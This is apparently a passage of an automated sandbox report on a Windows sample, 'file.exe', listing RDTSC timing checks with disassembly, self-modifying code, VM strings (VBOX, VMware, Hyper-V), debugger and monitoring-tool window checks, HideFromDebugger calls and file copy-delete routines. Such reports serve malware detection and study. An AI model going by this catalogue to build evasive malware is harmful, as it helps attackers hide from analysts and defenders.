                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18224 second address: C1822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1822A second address: C1822F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25FB4 second address: C25FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B100571Dh 0x00000009 popad 0x0000000a ja 00007FB9B1005718h 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C27899 second address: C2789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2789D second address: C278A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B884 second address: C2B88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30A2B second address: C30A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36E03 second address: C36E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB9B11D9857h 0x0000000d jp 00007FB9B11D9846h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36E30 second address: C36E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9B1005724h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F6A0 second address: C3F6AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B11D9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F6AA second address: C3F6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E54 second address: C47E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007FB9B11D984Ch 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FB9B11D9851h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E7D second address: C47E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47E88 second address: C47E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48003 second address: C4800B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4800B second address: C48011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48011 second address: C48015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4859F second address: C485E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB9B11D986Eh 0x0000000b jmp 00007FB9B11D984Dh 0x00000010 jg 00007FB9B11D984Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4870F second address: C48742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007FB9B100571Eh 0x0000000b pushad 0x0000000c jo 00007FB9B1005716h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007FB9B1005725h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488A4 second address: C488BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB9B11D9850h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488BD second address: C488C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488C1 second address: C488DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9B11D9853h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488DE second address: C488F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005725h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C488F7 second address: C48915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C27E second address: C4C293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9B1005716h 0x0000000a popad 0x0000000b jc 00007FB9B100571Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53734 second address: C53739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53739 second address: C53772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB9B1005716h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jg 00007FB9B1005733h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53772 second address: C53776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53776 second address: C5377E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5377E second address: C5378F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FB9B11D9846h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A4D9 second address: C5A515 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB9B100572Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9B1005724h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A515 second address: C5A519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A519 second address: C5A52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005720h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A52D second address: C5A533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5A533 second address: C5A54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9B100572Ah 0x00000008 jmp 00007FB9B100571Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3A7 second address: C5D3BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9853h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3BE second address: C5D3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D3C4 second address: C5D3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB9B11D9846h 0x0000000a jmp 00007FB9B11D9853h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA06 second address: C6CA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FB9B1005724h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FB9B1005716h 0x00000013 pop edx 0x00000014 popad 0x00000015 jnl 00007FB9B1005738h 0x0000001b pushad 0x0000001c jno 00007FB9B1005716h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA39 second address: C6CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CA3F second address: C6CA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FB9B1005716h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D917 second address: C7D91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C904 second address: C7C91D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B1005716h 0x00000008 jmp 00007FB9B100571Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C91D second address: C7C92A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB9B11D9846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD87 second address: C7CD8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD8D second address: C7CD9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ah 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D082 second address: C7D086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D1CA second address: C7D1D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D31B second address: C7D32B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007FB9B1005716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D32B second address: C7D337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5D9 second address: C7D5E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5E7 second address: C7D5F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D5F4 second address: C7D5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80449 second address: C8044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8077E second address: C80797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jns 00007FB9B1005716h 0x00000012 jno 00007FB9B1005716h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80797 second address: C807E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ebx 0x0000000b sub dword ptr [ebp+12457670h], eax 0x00000011 pop edx 0x00000012 push dword ptr [ebp+12458AE8h] 0x00000018 cld 0x00000019 pushad 0x0000001a mov esi, dword ptr [ebp+122D288Eh] 0x00000020 sub dword ptr [ebp+122D293Ch], esi 0x00000026 popad 0x00000027 call 00007FB9B11D9849h 0x0000002c pushad 0x0000002d ja 00007FB9B11D984Ch 0x00000033 jno 00007FB9B11D9846h 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c pop edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C807E3 second address: C807E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8344C second address: C83452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83452 second address: C83472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9B1005716h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B1005723h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83472 second address: C83481 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C854A4 second address: C854A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C854A8 second address: C854AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F026A second address: 52F0270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0270 second address: 52F0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0274 second address: 52F02DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB9B1005726h 0x00000011 push eax 0x00000012 jmp 00007FB9B100571Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FB9B1005726h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB9B1005727h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03DC second address: 52F03E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03E0 second address: 52F03E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03E6 second address: 52F03EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03EC second address: 52F0442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005728h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB9B100571Ch 0x00000015 and esi, 04292DD8h 0x0000001b jmp 00007FB9B100571Bh 0x00000020 popfd 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB9B100571Dh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0442 second address: 52F0446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9F1B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B90049 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B8EAA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B8E6CE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB8814 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C1AA42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0079DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0079E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0079ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0079BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00791160 GetSystemInfo,ExitProcess,0_2_00791160
                Source: file.exe, file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware1a
                Source: file.exe, 00000000.00000002.1789228980.0000000001523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789228980.00000000014F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13338
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13341
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13359
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13353
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13393
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007945C0 VirtualProtect ?,00000004,00000100,000000000_2_007945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007A9860
